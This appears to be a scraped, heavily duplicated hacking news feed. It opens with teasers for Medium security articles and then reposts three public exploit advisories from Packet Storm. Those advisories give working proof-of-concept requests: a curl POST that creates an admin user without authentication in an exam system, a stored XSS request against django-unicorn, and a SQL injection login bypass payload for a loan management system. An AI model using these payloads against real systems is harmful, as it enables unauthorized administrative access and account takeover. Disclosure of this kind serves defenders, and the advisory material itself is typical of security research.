Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe | Content Discovery Walkthrough
https://cdn-images-1.medium.com/max/600/1*8wzZxNuJTmamY8LzE5c-dg.png
Learn the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe | Content Discovery Walkthrough
https://cdn-images-1.medium.com/max/600/1*8wzZxNuJTmamY8LzE5c-dg.png
Learn the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe | Content Discovery Walkthrough
Learn the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to secure my Facebook account from hack
It’s a great plan to have a say some extra layers of security on your Facebook account. A cheater might use your account information to…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to secure my Facebook account from hack
It’s a great plan to have a say some extra layers of security on your Facebook account. A cheater might use your account information to…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to secure my Facebook account from hack
It’s a great plan to have a say some extra layers of security on your Facebook account. A cheater might use your account information to…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The 6 Hats Explained
https://cdn-images-1.medium.com/max/1080/1*3JPn-c3UfEPUYMCZTIrTzg.jpeg
Black hat, white hat, grey hat, red hat, blue hat, and green hat. No, these aren’t items in an apparel store’s catalog — they’re the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
The 6 Hats Explained
https://cdn-images-1.medium.com/max/1080/1*3JPn-c3UfEPUYMCZTIrTzg.jpeg
Black hat, white hat, grey hat, red hat, blue hat, and green hat. No, these aren’t items in an apparel store’s catalog — they’re the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The 6 Hats Explained
Black hat, white hat, grey hat, red hat, blue hat, and green hat. No, these aren’t items in an apparel store’s catalog — they’re the…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Reviewing the Practical Network Penetration Tester (PNPT) Course Pt. 3
https://cdn-images-1.medium.com/max/1500/1*3bKZFW1X01iYMNwdMUszdQ.jpeg
Covering the Ethical Hacking Methodology and Information Gathering Modules for the Practical Ethical Hacker course from TCM Security
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Reviewing the Practical Network Penetration Tester (PNPT) Course Pt. 3
https://cdn-images-1.medium.com/max/1500/1*3bKZFW1X01iYMNwdMUszdQ.jpeg
Covering the Ethical Hacking Methodology and Information Gathering Modules for the Practical Ethical Hacker course from TCM Security
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Reviewing the Practical Network Penetration Tester (PNPT) Course Pt. 3
Covering the Ethical Hacking Methodology and Information Gathering Modules for the Practical Ethical Hacker course from TCM Security
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Surf Dark Web Safely, Now!
https://cdn-images-1.medium.com/max/633/1*gL_yTtO3dzkkVWrng9TcuQ.png
The dark web is anything that is not index by normal search engines like Google, Bing, etc. The dark web is the dark corner of the whole…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Surf Dark Web Safely, Now!
https://cdn-images-1.medium.com/max/633/1*gL_yTtO3dzkkVWrng9TcuQ.png
The dark web is anything that is not index by normal search engines like Google, Bing, etc. The dark web is the dark corner of the whole…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Surf Dark Web Safely, Now!
The dark web is anything that is not index by normal search engines like Google, Bing, etc. The dark web is the dark corner of the whole…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Glimpse Into Web Penetration Testing
A web penetration testing example, that I did me and @Edd13Mora in our free time, for beginners to have an idea about websec.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Glimpse Into Web Penetration Testing
A web penetration testing example, that I did me and @Edd13Mora in our free time, for beginners to have an idea about websec.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Glimpse Into Web Penetration Testing
A web penetration testing example, that I did me and @Edd13Mora in our free time, for beginners to have an idea about websec.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Los investigadores advierten sobre el malware FontOnLake Rootkit dirigido a sistemas Linux
https://cdn-images-1.medium.com/max/1329/0*OGYN3Y3c0puxd5Tl
PUBLICADO EN 8 OCTUBRE, 2021POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Los investigadores advierten sobre el malware FontOnLake Rootkit dirigido a sistemas Linux
https://cdn-images-1.medium.com/max/1329/0*OGYN3Y3c0puxd5Tl
PUBLICADO EN 8 OCTUBRE, 2021POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Los investigadores advierten sobre el malware FontOnLake Rootkit dirigido a sistemas Linux
PUBLICADO EN 8 OCTUBRE, 2021POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Simple Online College Entrance Exam System 1.0 Unauthenticated Admin Creation
https://4.bp.blogspot.com/-5kb4UTwsKkE/WWlvjussFoI/AAAAAAAAIQs/uqojaqb90NcMo4ROOoH-c5uvdKeDdbGswCLcBGAs/s1600/h94.png
Simple Online College Entrance Exam System version 1.0 suffers from an unauthenticated admin creation vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Simple Online College Entrance Exam System 1.0 Unauthenticated Admin Creation
https://4.bp.blogspot.com/-5kb4UTwsKkE/WWlvjussFoI/AAAAAAAAIQs/uqojaqb90NcMo4ROOoH-c5uvdKeDdbGswCLcBGAs/s1600/h94.png
Simple Online College Entrance Exam System version 1.0 suffers from an unauthenticated admin creation vulnerability.
MD5 |
28bb852e8a1687d8a35b3b246f572b51Download
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Unauthenticated admin creation
Unauthenticated admin creation:
Request:
POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1
Host: 127.0.0.1
Content-Length: 42
id=&fullname=admin2&username=admin2&type=1
PoC to create an admin user named exploitdb and password exploitdb:
curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Simple Online College Entrance Exam System 1.0 Unauthenticated Admin Creation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
django-unicorn 0.35.3 Cross Site Scripting
https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
django-unicorn versions 0.35.3 and below suffer from persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
django-unicorn 0.35.3 Cross Site Scripting
https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
django-unicorn versions 0.35.3 and below suffer from persistent cross site scripting vulnerability.
MD5 |
3e1eaca5d1e44c6dfb0341c2660a27afDownload
# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)
# Date: 10/7/21
# Exploit Author: Raven Security Associates, Inc. (ravensecurity.net)
# Software Link: https://pypi.org/project/django-unicorn/
# Version: <=
# CVE: CVE-2021-42053
django-unicorn <=
Step 1: Go to www.django-unicorn.com/unicorn/message/todo
Step 2: Enter an xss payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet).
POC:
POST /unicorn/message/todo HTTP/2
Host: www.django-unicorn.com
Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Content-Length: 258
Sec-Ch-Ua: "";Not A Brand"";v=""99"", ""Chromium"";v=""94""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Sec-Ch-Ua-Platform: ""Linux""
Origin: https://www.django-unicorn.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.django-unicorn.com/examples/todo
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{""id"":""Q43GSmJh"",""data"":{""task"":"""",""tasks"":[]},""checksum"":""4ck2yTwX"",""actionQueue"":[{""type"":""syncInput"",""payload"":{""name"":""task"",""value"":""x ""}},{""type"":""callMethod"",""payload"":{""name"":""add""},""partial"":{}}],""epoch"":1633578678871}
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/2 200 OK
Date: Thu, 07 Oct 2021 03:51:18 GMT
Content-Type: application/json
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Via: 1.1 vegur
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=604800, report-uri=""https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct""
Report-To: {""endpoints"":[{""url"":""https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y""}],""group"":""cf-nel"",""max_age"":604800}
Nel: {""success_fraction"":0,""report_to"":""cf-nel"",""max_age"":604800}
Server: cloudflare
Cf-Ray: 69a42b973f6a6396-ORD
Alt-Svc: h3="":443""; ma=86400, h3-29="":443""; ma=86400, h3-28="":443""; ma=86400, h3-27="":443""; ma=86400
{""id"": ""Q43GSmJh"", ""data"": {""tasks"": [""x ""]}, ""errors"": {}, ""checksum"": ""ZQn54Ct4"", ""dom"": ""
\n\n\n\nAdd\n
\n\n
* x \n
\nClear all tasks\n
\n
\n"", ""return"": {""method"": ""add"", ""params"": [], ""value"": null}}"
"ENDTEXT"
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
django-unicorn 0.35.3 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Loan Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-B5GiRC1v-wQ/WWlu5E53nEI/AAAAAAAAIJE/W3BLkm7Hy_YnB0vtTzhGYY_ZESaF8C84ACLcBGAs/s1600/h105.png
Loan Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Loan Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-B5GiRC1v-wQ/WWlu5E53nEI/AAAAAAAAIJE/W3BLkm7Hy_YnB0vtTzhGYY_ZESaF8C84ACLcBGAs/s1600/h105.png
Loan Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
908df8dec45930df9a58c1149a71b1eaDownload
# Exploit Title: Loan Management System 1.0 - SQLi Authentication Bypass
# Date: 08.10.2021
# Exploit Author: Merve Oral
# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14471&title=Loan+Management+System+using+PHP%2FMySQL+with+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
Steps To Reproduce:
1 - Go to the login page http://localhost/audit_trail/login.php
2 - Enter the payload to username field as "admin' or '1'='1'#" without double-quotes and type anything to password field.
3 - Click on "Login" button and you are logged in as administrator.
PoC
POST /loan/ajax.php?action=login HTTP/1.1
Host: merve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
Origin: http://merve
Connection: close
Referer: http://merve/loan/login.php
Cookie: PHPSESSID=911fclrpoa87v9dsp9lh28ck0h
username=admin'+or+'1'%3D'1'%23&password=any
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Loan Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.